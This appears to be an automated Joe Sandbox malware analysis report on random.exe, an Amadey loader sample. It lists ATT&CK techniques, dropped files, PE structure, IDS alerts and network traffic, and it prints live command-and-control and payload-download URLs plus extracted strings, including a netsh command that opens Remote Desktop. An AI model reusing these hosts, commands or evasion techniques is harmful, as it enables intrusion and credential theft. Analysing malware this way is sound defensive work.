I9scK9sWeUZgb0TXKGueOnZ82EMwBx==J9Q7SN9lhAG=I9scK9su3U2bIsQcJq==Uw1T0NAveETnbz3igJK=LMNU0MEXhEjqbkzsdJbhjXCp2USz7DLAaM6k0MHcPSXkbDSdKj==I7==cS RewIrh02bLUKdN0GeRF==cTIZdm==ccxk0w0pSSNVZc0dgkObTDD2d6LY2KCp2UozRTG=MtsmNtrWQRi=MtsmNtrWQhG=MtsmNtrWQhK=MtsmNtrWQ0W=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
            Command and Scripting Interpreter            		1
            Scheduled Task/Job            		12
            Process Injection            		11
            Masquerading            		OS Credential Dumping741
            Security Software Discovery            		1
            Remote Desktop Protocol            		Data from Local System11
            Ingress Tool Transfer            		Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault Accounts1
            Scheduled Task/Job            		1
            DLL Side-Loading            		1
            Scheduled Task/Job            		241
            Virtualization/Sandbox Evasion            		LSASS Memory2
            Process Discovery            		Remote Desktop ProtocolData from Removable Media2
            Non-Application Layer Protocol            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            DLL Side-Loading            		12
            Process Injection            		Security Account Manager241
            Virtualization/Sandbox Evasion            		SMB/Windows Admin SharesData from Network Shared Drive112
            Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
            Obfuscated Files or Information            		NTDS1
            Application Window Discovery            		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script12
            Software Packing            		LSA Secrets1
            File and Directory Discovery            		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            DLL Side-Loading            		Cached Domain Credentials213
            System Information Discovery            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 signatures2 2 Behavior Graph ID: 1651721 Sample: random.exe Startdate: 29/03/2025 Architecture: WINDOWS Score: 100 28 Suricata IDS alerts for network traffic 2->28 30 Found malware configuration 2->30 32 Antivirus detection for URL or domain 2->32 34 9 other signatures 2->34 6 random.exe 5 2->6         started        10 rapes.exe 19 2->10         started        process3 dnsIp4 16 C:\Users\user\AppData\Local\...\rapes.exe, PE32 6->16 dropped 18 C:\Users\user\...\rapes.exe:Zone.Identifier, ASCII 6->18 dropped 36 Detected unpacking (changes PE section rights) 6->36 38 Contains functionality to start a terminal service 6->38 40 Tries to evade debugger and weak emulator (self modifying code) 6->40 42 Tries to detect virtualization through RDTSC time measurements 6->42 13 rapes.exe 6->13         started        24 176.113.115.6, 49699, 49700, 49703 SELECTELRU Russian Federation 10->24 26 176.113.115.7, 49701, 49704, 80 SELECTELRU Russian Federation 10->26 20 C:\Users\user\AppData\...\aae6fb6455.exe, PE32 10->20 dropped 22 C:\Users\user\AppData\Local\...\random[1].exe, PE32 10->22 dropped 44 Hides threads from debuggers 10->44 46 Tries to detect sandboxes / dynamic malware analysis system (registry check) 10->46 48 Tries to detect process monitoring tools (Task Manager, Process Explorer etc.) 10->48 file5 signatures6 process7 signatures8 50 Antivirus detection for dropped file 13->50 52 Multi AV Scanner detection for dropped file 13->52 54 Detected unpacking (changes PE section rights) 13->54 56 7 other signatures 13->56

            Screenshots

            Download Video

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            random.exe55%VirustotalBrowse
            random.exe61%ReversingLabsWin32.Malware.Heuristic
            random.exe100%AviraTR/Crypt.TPM.Gen
            SAMPLE100%Joe Sandbox ML

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe100%AviraTR/Crypt.TPM.Gen
            C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe61%ReversingLabsWin32.Malware.Heuristic

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            http://176.113.115.7/files/newdef/apple.exe100%Avira URL Cloudmalware
            http://176.113.115.7/files/rast333a/random.exe100%Avira URL Cloudphishing

            Domains and IPs

            Download Network PCAP: filteredfull

            Contacted Domains

            No contacted domains info

            Contacted URLs

            NameMaliciousAntivirus DetectionReputation
            http://176.113.115.6/Ni9kiput/index.phpfalse
              		high
              http://176.113.115.7/files/newdef/apple.exefalse
              • Avira URL Cloud: malware
              		unknown
              http://176.113.115.7/files/rast333a/random.exetrue
              • Avira URL Cloud: phishing
              		unknown

              World Map of Contacted IPs

              • No. of IPs < 25%
              • 25% < No. of IPs < 50%
              • 50% < No. of IPs < 75%
              • 75% < No. of IPs

              Public IPs

              IPDomainCountryFlagASNASN NameMalicious
              176.113.115.7
              		unknownRussian Federation
              		49505SELECTELRUfalse
              176.113.115.6
              		unknownRussian Federation
              		49505SELECTELRUtrue

              General Information

              Joe Sandbox version:42.0.0 Malachite
              Analysis ID:1651721
              Start date and time:2025-03-29 14:25:14 +01:00
              Joe Sandbox product:CloudBasic
              Overall analysis duration:0h 5m 30s
              Hypervisor based Inspection enabled:false
              Report type:full
              Cookbook file name:default.jbs
              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 134, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
              Number of analysed new started processes analysed:13
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:0
              Technologies:
              • HCA enabled
              • EGA enabled
              • AMSI enabled
              Analysis Mode:default
              Sample name:random.exe
              Detection:MAL
              Classification:mal100.troj.spyw.evad.winEXE@5/5@0/2
              EGA Information:Failed
              HCA Information:Failed
              Cookbook Comments:
              • Found application associated with file extension: .exe
              • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, sppsvc.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
              • Excluded IPs from analysis (whitelisted): 23.204.23.20, 4.175.87.197
              • Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
              • Execution Graph export aborted for target random.exe, PID 7324 because it is empty
              • Execution Graph export aborted for target rapes.exe, PID 7592 because there are no executed function
              • Not all processes where analyzed, report is missing behavior information
              • Report size getting too big, too many NtOpenKeyEx calls found.
              • Report size getting too big, too many NtProtectVirtualMemory calls found.
              • Report size getting too big, too many NtQueryValueKey calls found.
              • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

              Simulations

              Behavior and APIs

              TimeTypeDescription
              09:27:03API Interceptor588176x Sleep call for process: rapes.exe modified
              14:26:10Task SchedulerRun new task: rapes path: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe

              Joe Sandbox View / Context

              IPs

              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              176.113.115.7random.exeGet hashmaliciousLummaC StealerBrowse
              • 176.113.115.7/mine/random.exe
              SUAosT64HD.exeGet hashmaliciousAmadey, Babadeda, LummaC Stealer, PureLog Stealer, zgRATBrowse
              • 176.113.115.7/files/martin1/martin.zip
              BF7YWWbqVz.exeGet hashmaliciousAmadey, CryptOne, LummaC Stealer, Stealc, VidarBrowse
              • 176.113.115.7/mine/random.exe
              FRCe39S0oE.exeGet hashmaliciousAmadeyBrowse
              • 176.113.115.7/files/2043702969/PqFatgo.exe
              random.exeGet hashmaliciousAmadey, LummaC StealerBrowse
              • 176.113.115.7/mine/random.exe
              6xdW3oRY63.exeGet hashmaliciousAmadey, DarkVision Rat, LummaC Stealer, VidarBrowse
              • 176.113.115.7/mine/random.exe
              work.jsGet hashmaliciousAmadey, LummaC Stealer, PureLog Stealer, Stealc, VidarBrowse
              • 176.113.115.7/files/unique2/random.exe
              random.exeGet hashmaliciousAmadey, LummaC Stealer, Stealc, XmrigBrowse
              • 176.113.115.7/files/crazytimeya/random.exe
              random.exeGet hashmaliciousAmadeyBrowse
              • 176.113.115.7/files/qqdoup/random.exe
              VSAXXKuhCu.exeGet hashmaliciousAmadey, AsyncRATBrowse
              • 176.113.115.7/files/unique2/random.exe
              176.113.115.6SUAosT64HD.exeGet hashmaliciousAmadey, Babadeda, LummaC Stealer, PureLog Stealer, zgRATBrowse
              • 176.113.115.6/Ni9kiput/index.php
              FRCe39S0oE.exeGet hashmaliciousAmadeyBrowse
              • 176.113.115.6/Ni9kiput/index.php
              6xdW3oRY63.exeGet hashmaliciousAmadey, DarkVision Rat, LummaC Stealer, VidarBrowse
              • 176.113.115.6/Ni9kiput/index.php
              random.exeGet hashmaliciousAmadey, LummaC Stealer, Stealc, XmrigBrowse
              • 176.113.115.6/Ni9kiput/index.php
              random.exeGet hashmaliciousAmadeyBrowse
              • 176.113.115.6/Ni9kiput/index.php
              random.exeGet hashmaliciousAmadeyBrowse
              • 176.113.115.6/Ni9kiput/index.php
              VSAXXKuhCu.exeGet hashmaliciousAmadey, AsyncRATBrowse
              • 176.113.115.6/Ni9kiput/index.php
              L0erlgyZ6f.exeGet hashmaliciousAmadey, LummaC StealerBrowse
              • 176.113.115.6/Ni9kiput/index.php
              ET3Sc57mx4.exeGet hashmaliciousAmadeyBrowse
              • 176.113.115.6/Ni9kiput/index.php
              13s1HMkHKv.exeGet hashmaliciousAmadey, DarkVision Rat, Fallen Miner, LummaC StealerBrowse
              • 176.113.115.6/Ni9kiput/index.php

              Domains

              No context

              ASNs

              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              SELECTELRUrandom.exeGet hashmaliciousLummaC StealerBrowse
              • 176.113.115.7
              SUAosT64HD.exeGet hashmaliciousAmadey, Babadeda, LummaC Stealer, PureLog Stealer, zgRATBrowse
              • 176.113.115.6
              BF7YWWbqVz.exeGet hashmaliciousAmadey, CryptOne, LummaC Stealer, Stealc, VidarBrowse
              • 176.113.115.7
              Okami.arm4.elfGet hashmaliciousGafgyt, MiraiBrowse
              • 94.154.34.47
              Okami.ppc.elfGet hashmaliciousGafgyt, MiraiBrowse
              • 94.154.34.47
              Okami.arm5.elfGet hashmaliciousGafgyt, MiraiBrowse
              • 94.154.34.47
              Okami.i586.elfGet hashmaliciousGafgyt, MiraiBrowse
              • 94.154.34.47
              Okami.m68k.elfGet hashmaliciousGafgyt, MiraiBrowse
              • 94.154.34.47
              Okami.sh4.elfGet hashmaliciousGafgyt, MiraiBrowse
              • 94.154.34.47
              Okami.sparc.elfGet hashmaliciousGafgyt, MiraiBrowse
              • 94.154.34.47
              SELECTELRUrandom.exeGet hashmaliciousLummaC StealerBrowse
              • 176.113.115.7
              SUAosT64HD.exeGet hashmaliciousAmadey, Babadeda, LummaC Stealer, PureLog Stealer, zgRATBrowse
              • 176.113.115.6
              BF7YWWbqVz.exeGet hashmaliciousAmadey, CryptOne, LummaC Stealer, Stealc, VidarBrowse
              • 176.113.115.7
              Okami.arm4.elfGet hashmaliciousGafgyt, MiraiBrowse
              • 94.154.34.47
              Okami.ppc.elfGet hashmaliciousGafgyt, MiraiBrowse
              • 94.154.34.47
              Okami.arm5.elfGet hashmaliciousGafgyt, MiraiBrowse
              • 94.154.34.47
              Okami.i586.elfGet hashmaliciousGafgyt, MiraiBrowse
              • 94.154.34.47
              Okami.m68k.elfGet hashmaliciousGafgyt, MiraiBrowse
              • 94.154.34.47
              Okami.sh4.elfGet hashmaliciousGafgyt, MiraiBrowse
              • 94.154.34.47
              Okami.sparc.elfGet hashmaliciousGafgyt, MiraiBrowse
              • 94.154.34.47

              JA3 Fingerprints

              No context

              Dropped Files

              No context

              Created / dropped Files

              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\random[1].exe

              Download File
              Process:C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe
              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
              Category:dropped
              Size (bytes):1081344
              Entropy (8bit):7.950126424052822
              Encrypted:false
              SSDEEP:24576:gwP1DUnNUvylO34/FVcVP7XAaA5VuVEtWlWyHWaWtkW85qRFp7LeSlp:JdqwyO34/UmVuVE0lW77H8gRFp7LjH
              MD5:7D9C9C5D7BA62C1D52B36020890CCE28
              SHA1:472C871CB56E1495852BCAA459E93E6782149FB0
              SHA-256:D07B0C999BDD079D178CB8552D552175041A2369E6D5ADE2D8140CF1321B091C
              SHA-512:D27EC80A1DB1B9257AFC99AFC070342169FC8D5059AF0F6DF0B4E40DB9777C8DB9FD614FCF3250554C6D123395A4653F0ED099077D43EDC65F32B622B9C7AF38
              Malicious:true
              Reputation:low
              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........Y..Y..Y..3..p..Y..[....[..Y..V....X..RichY..................PE..L......d..............................K...........@...........................K.....8.!...@.................................[...o................................................................................................................... . .........J..................@....rsrc................Z..............@....idata .............^..............@... . *..........`..............@...brhrhyxz..... 1......b..............@...epnvongl......K....... .............@....taggant.0....K..".... .............@...........................................................................................................................................................................................................................................................................

              C:\Users\user\AppData\Local\Temp\10362200101\aae6fb6455.exe

              Download File
              Process:C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe
              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
              Category:dropped
              Size (bytes):1081344
              Entropy (8bit):7.950126424052822
              Encrypted:false
              SSDEEP:24576:gwP1DUnNUvylO34/FVcVP7XAaA5VuVEtWlWyHWaWtkW85qRFp7LeSlp:JdqwyO34/UmVuVE0lW77H8gRFp7LjH
              MD5:7D9C9C5D7BA62C1D52B36020890CCE28
              SHA1:472C871CB56E1495852BCAA459E93E6782149FB0
              SHA-256:D07B0C999BDD079D178CB8552D552175041A2369E6D5ADE2D8140CF1321B091C
              SHA-512:D27EC80A1DB1B9257AFC99AFC070342169FC8D5059AF0F6DF0B4E40DB9777C8DB9FD614FCF3250554C6D123395A4653F0ED099077D43EDC65F32B622B9C7AF38
              Malicious:true
              Reputation:low
              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........Y..Y..Y..3..p..Y..[....[..Y..V....X..RichY..................PE..L......d..............................K...........@...........................K.....8.!...@.................................[...o................................................................................................................... . .........J..................@....rsrc................Z..............@....idata .............^..............@... . *..........`..............@...brhrhyxz..... 1......b..............@...epnvongl......K....... .............@....taggant.0....K..".... .............@...........................................................................................................................................................................................................................................................................

              C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe

              Download File
              Process:C:\Users\user\Desktop\random.exe
              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
              Category:dropped
              Size (bytes):1903104
              Entropy (8bit):7.948758780466538
              Encrypted:false
              SSDEEP:49152:1U0Hx5st812q2hKXqY84SW6fi5jSJY8xxN0hX:20HxINni5jSnv
              MD5:0B7487B0B78BD7587E0583B13B068F02
              SHA1:C55A13D7B730BA5E51511979D11B04D11ACF53AB
              SHA-256:DAD41FE11699FFD7E23D5BF0C558966CF6156626752E4A517D0C955CBB7B5B60
              SHA-512:DB7E99356DF898FA3176326BCD9198FA138939BCF84A1881DE99EA2915AA108703D50DDFB60C11FDFB5660AB88C42B49607B4DB9EB829171A9D7DEDDC5A3EDF8
              Malicious:true
              Antivirus:
              • Antivirus: Avira, Detection: 100%
              • Antivirus: ReversingLabs, Detection: 61%
              Reputation:low
              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........BS..,...,...,.../...,...)./.,..(...,../...,..)...,.......,...(...,...-...,...-.g.,.Y.%...,.Y.....,.Y.....,.Rich..,.........PE..L...#..g..............................K...........@...........................K......s....@.................................W...k.......D...................8.K..............................K..................................................... . ............................@....rsrc...D...........................@....idata ............................@... ..*.........................@...kxeedhki......1.....................@...fwpnfjce......K.....................@....taggant.0....K.."..................@...........................................................................................................................................................................................................................

              C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe:Zone.Identifier

              Download File
              Process:C:\Users\user\Desktop\random.exe
              File Type:ASCII text, with CRLF line terminators
              Category:modified
              Size (bytes):26
              Entropy (8bit):3.95006375643621
              Encrypted:false
              SSDEEP:3:ggPYV:rPYV
              MD5:187F488E27DB4AF347237FE461A079AD
              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
              Malicious:true
              Reputation:high, very likely benign file
              Preview:[ZoneTransfer]....ZoneId=0

              C:\Windows\Tasks\rapes.job

              Download File
              Process:C:\Users\user\Desktop\random.exe
              File Type:data
              Category:dropped
              Size (bytes):300
              Entropy (8bit):3.37194579021094
              Encrypted:false
              SSDEEP:3:08AMjfD//u2/GjLlAdVdhOEjlpQlyEXlxlXVl5HsZukamA6tttxgyS9S7ARjLlAO:LAMfXDXUEZ+lX1X36tE9+AQy0lVcEt0
              MD5:F4801B503790964E4A56B988C18322EC
              SHA1:BB6688763217B2344A635935E039387375557AE2
              SHA-256:817510F1241AFE1896A90C680F98D150C73BB150A08BBBE0C98EE25CF458663F
              SHA-512:8BE23011722D1DED1DA2383E1CCAC10F0704D13A22A18524AB214C9E43F0D40B50AF787E157CCF49606815A0877AF8B2D5ABC4091AE4613DDEE3DE7C41A4432A
              Malicious:false
              Reputation:low
              Preview:.........aB.:^^ c$iF.......<... .....s.......... ....................:.C.:.\.U.s.e.r.s.\.e.n.g.i.n.e.e.r.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.b.b.5.5.6.c.f.f.4.a.\.r.a.p.e.s...e.x.e.........E.N.G.I.N.E.E.R.-.P.C.\.e.n.g.i.n.e.e.r...................0...................@3P.........................

              Static File Info

              General

              File type:PE32 executable (GUI) Intel 80386, for MS Windows
              Entropy (8bit):7.948758780466538
              TrID:
              • Win32 Executable (generic) a (10002005/4) 99.96%
              • Generic Win/DOS Executable (2004/3) 0.02%
              • DOS Executable Generic (2002/1) 0.02%
              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
              File name:random.exe
              File size:1'903'104 bytes
              MD5:0b7487b0b78bd7587e0583b13b068f02
              SHA1:c55a13d7b730ba5e51511979d11b04d11acf53ab
              SHA256:dad41fe11699ffd7e23d5bf0c558966cf6156626752e4a517d0c955cbb7b5b60
              SHA512:db7e99356df898fa3176326bcd9198fa138939bcf84a1881de99ea2915aa108703d50ddfb60c11fdfb5660ab88c42b49607b4db9eb829171a9d7deddc5a3edf8
              SSDEEP:49152:1U0Hx5st812q2hKXqY84SW6fi5jSJY8xxN0hX:20HxINni5jSnv
              TLSH:2C9533AD6D5D5631E6116871BEFB808BB350AE26D4CFCC339F8D9CE165CA52843C89C8
              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........BS..,...,...,.../...,...)./.,...(...,.../...,...)...,.......,...(...,...-...,...-.g.,.Y.%...,.Y.....,.Y.....,.Rich..,........

              File Icon

              Icon Hash:90cececece8e8eb0

              Static PE Info

              General

              Entrypoint:0x8ba000
              Entrypoint Section:.taggant
              Digitally signed:false
              Imagebase:0x400000
              Subsystem:windows gui
              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
              DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
              Time Stamp:0x67BB0123 [Sun Feb 23 11:06:11 2025 UTC]
              TLS Callbacks:
              CLR (.Net) Version:
              OS Version Major:6
              OS Version Minor:0
              File Version Major:6
              File Version Minor:0
              Subsystem Version Major:6
              Subsystem Version Minor:0
              Import Hash:2eabe9054cad5152567f0699947a2c5b
              Instruction
              jmp 00007F6B8CF344BAh
              psubsb mm3, qword ptr [eax+eax]
              add byte ptr [eax], al
              add byte ptr [eax], al
              jmp 00007F6B8CF364B5h
              add byte ptr [ebx], cl
              or al, byte ptr [eax]
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax-4Dh], ah
              adc dl, byte ptr [eax]
              NameVirtual AddressVirtual Size Is in Section
              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
              IMAGE_DIRECTORY_ENTRY_IMPORT0x6e0570x6b.idata
              IMAGE_DIRECTORY_ENTRY_RESOURCE0x6d0000x344.rsrc
              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
              IMAGE_DIRECTORY_ENTRY_BASERELOC0x4b85380x10kxeedhki
              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
              IMAGE_DIRECTORY_ENTRY_TLS0x4b84e80x18kxeedhki
              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
              IMAGE_DIRECTORY_ENTRY_IAT0x00x0
              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

              Sections

              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
              0x10000x6c0000x2d600555213ffd696c3aaba3419cba23eee4cFalse0.998810907369146data7.9846191069789585IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              .rsrc0x6d0000x3440x400d985035d1a5253d15173463b6f9e4c69False0.4345703125data5.395849414192414IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              .idata 0x6e0000x10000x2004cb0039f8b94591235da785993740c94False0.150390625data1.0398657838377494IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              0x6f0000x2aa0000x20040fb07456d91ea12c2d8093d0b70ee74unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              kxeedhki0x3190000x1a00000x19f600a3f93e69c561de3a97f89cad08e24726False0.9945873222615107data7.9528736172772545IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              fwpnfjce0x4b90000x10000x400d0c26af3a9f57c41bcf5f899d72e4864False0.806640625data6.33039407705815IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              .taggant0x4ba0000x30000x2200176e933e2b71616a0e44b942fa716b69False0.06502757352941177DOS executable (COM)0.7972609397702829IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              NameRVASizeTypeLanguageCountryZLIB Complexity
              RT_MANIFEST0x6d0700x152ASCII text, with CRLF line terminators0.6479289940828402
              RT_MANIFEST0x6d1c40x17dXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5931758530183727
              DLLImport
              kernel32.dlllstrcpy

              Possible Origin

              Language of compilation systemCountry where language is spokenMap
              EnglishUnited States

              Network Behavior

              Download Network PCAP: filteredfull

              Suricata IDS Alerts

              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
              2025-03-29T14:27:06.241251+01002856147ETPRO MALWARE Amadey CnC Activity M31192.168.2.649699176.113.115.680TCP
              2025-03-29T14:27:07.948733+01002060969ET MALWARE Amadey CnC Response1176.113.115.680192.168.2.649699TCP
              2025-03-29T14:27:10.262134+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.649701176.113.115.780TCP
              2025-03-29T14:28:11.827478+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.649704176.113.115.780TCP
              TimestampSource PortDest PortSource IPDest IP
              Mar 29, 2025 14:27:05.858313084 CET4969980192.168.2.6176.113.115.6
              Mar 29, 2025 14:27:06.047703981 CET8049699176.113.115.6192.168.2.6
              Mar 29, 2025 14:27:06.047818899 CET4969980192.168.2.6176.113.115.6
              Mar 29, 2025 14:27:06.048671007 CET4969980192.168.2.6176.113.115.6
              Mar 29, 2025 14:27:06.240582943 CET8049699176.113.115.6192.168.2.6
              Mar 29, 2025 14:27:06.241182089 CET8049699176.113.115.6192.168.2.6
              Mar 29, 2025 14:27:06.241250992 CET4969980192.168.2.6176.113.115.6
              Mar 29, 2025 14:27:07.750241995 CET4969980192.168.2.6176.113.115.6
              Mar 29, 2025 14:27:07.750458956 CET4970080192.168.2.6176.113.115.6
              Mar 29, 2025 14:27:07.948733091 CET8049699176.113.115.6192.168.2.6
              Mar 29, 2025 14:27:07.948822975 CET4969980192.168.2.6176.113.115.6
              Mar 29, 2025 14:27:07.969269991 CET8049700176.113.115.6192.168.2.6
              Mar 29, 2025 14:27:07.969383955 CET4970080192.168.2.6176.113.115.6
              Mar 29, 2025 14:27:07.969634056 CET4970080192.168.2.6176.113.115.6
              Mar 29, 2025 14:27:08.338385105 CET8049700176.113.115.6192.168.2.6
              Mar 29, 2025 14:27:08.338414907 CET8049700176.113.115.6192.168.2.6
              Mar 29, 2025 14:27:08.338428974 CET8049700176.113.115.6192.168.2.6
              Mar 29, 2025 14:27:08.338515997 CET4970080192.168.2.6176.113.115.6
              Mar 29, 2025 14:27:08.338562012 CET4970080192.168.2.6176.113.115.6
              Mar 29, 2025 14:27:09.846708059 CET4970180192.168.2.6176.113.115.7
              Mar 29, 2025 14:27:10.056830883 CET8049701176.113.115.7192.168.2.6
              Mar 29, 2025 14:27:10.057070017 CET4970180192.168.2.6176.113.115.7
              Mar 29, 2025 14:27:10.057282925 CET4970180192.168.2.6176.113.115.7
              Mar 29, 2025 14:27:10.261666059 CET8049701176.113.115.7192.168.2.6
              Mar 29, 2025 14:27:10.262011051 CET8049701176.113.115.7192.168.2.6
              Mar 29, 2025 14:27:10.262025118 CET8049701176.113.115.7192.168.2.6
              Mar 29, 2025 14:27:10.262063980 CET8049701176.113.115.7192.168.2.6
              Mar 29, 2025 14:27:10.262134075 CET4970180192.168.2.6176.113.115.7
              Mar 29, 2025 14:27:10.262134075 CET4970180192.168.2.6176.113.115.7
              Mar 29, 2025 14:27:10.264271975 CET4970180192.168.2.6176.113.115.7
              Mar 29, 2025 14:27:10.465912104 CET8049701176.113.115.7192.168.2.6
              Mar 29, 2025 14:27:10.465919018 CET8049701176.113.115.7192.168.2.6
              Mar 29, 2025 14:27:10.465924025 CET8049701176.113.115.7192.168.2.6
              Mar 29, 2025 14:27:10.465938091 CET8049701176.113.115.7192.168.2.6
              Mar 29, 2025 14:27:10.466145039 CET4970180192.168.2.6176.113.115.7
              Mar 29, 2025 14:27:10.466993093 CET8049701176.113.115.7192.168.2.6
              Mar 29, 2025 14:27:10.467005014 CET8049701176.113.115.7192.168.2.6
              Mar 29, 2025 14:27:10.467055082 CET4970180192.168.2.6176.113.115.7
              Mar 29, 2025 14:27:10.677774906 CET8049701176.113.115.7192.168.2.6
              Mar 29, 2025 14:27:10.677795887 CET8049701176.113.115.7192.168.2.6
              Mar 29, 2025 14:27:10.677808046 CET8049701176.113.115.7192.168.2.6
              Mar 29, 2025 14:27:10.677819967 CET8049701176.113.115.7192.168.2.6
              Mar 29, 2025 14:27:10.677850962 CET4970180192.168.2.6176.113.115.7
              Mar 29, 2025 14:27:10.677902937 CET4970180192.168.2.6176.113.115.7
              Mar 29, 2025 14:27:10.679322958 CET8049701176.113.115.7192.168.2.6
              Mar 29, 2025 14:27:10.679346085 CET8049701176.113.115.7192.168.2.6
              Mar 29, 2025 14:27:10.679385900 CET4970180192.168.2.6176.113.115.7
              Mar 29, 2025 14:27:10.679419041 CET4970180192.168.2.6176.113.115.7
              Mar 29, 2025 14:27:10.885941982 CET8049701176.113.115.7192.168.2.6
              Mar 29, 2025 14:27:10.885996103 CET4970180192.168.2.6176.113.115.7
              Mar 29, 2025 14:27:10.885998011 CET8049701176.113.115.7192.168.2.6
              Mar 29, 2025 14:27:10.886012077 CET8049701176.113.115.7192.168.2.6
